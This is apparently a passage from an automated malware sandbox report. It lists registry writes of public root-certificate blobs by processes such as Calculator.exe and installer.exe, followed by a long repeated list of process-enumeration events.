Calculator.exeFri051e1e7444.exeinstaller.exedescription ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 190000000100000010000000ea6089055218053dd01e37e1d806eedf0300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0b00000001000000100000005300650063007400690067006f0000001d0000000100000010000000885010358d29a38f059b028559c95f901400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd253000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd9796254832000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd Calculator.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 Fri051e1e7444.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E Calculator.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd Calculator.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000000400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e0f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f6362000000010000002000000096bcec06264976f37460779acf28c5a7cfe8a3c0aae11a8ffcee05c0bddf08c60b000000010000001a0000004900530052004700200052006f006f0074002000580031000000090000000100000016000000301406082b0601050507030206082b0601050507030114000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e1d000000010000001000000073b6876195f5d18e048510422aef04e3030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e81900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 Fri051e1e7444.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc36200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Fri051e1e7444.exeCoEA_w0kyWG2WXlI_NmzGIeB.exepid Process 2860 Fri051e1e7444.exe 2860 Fri051e1e7444.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 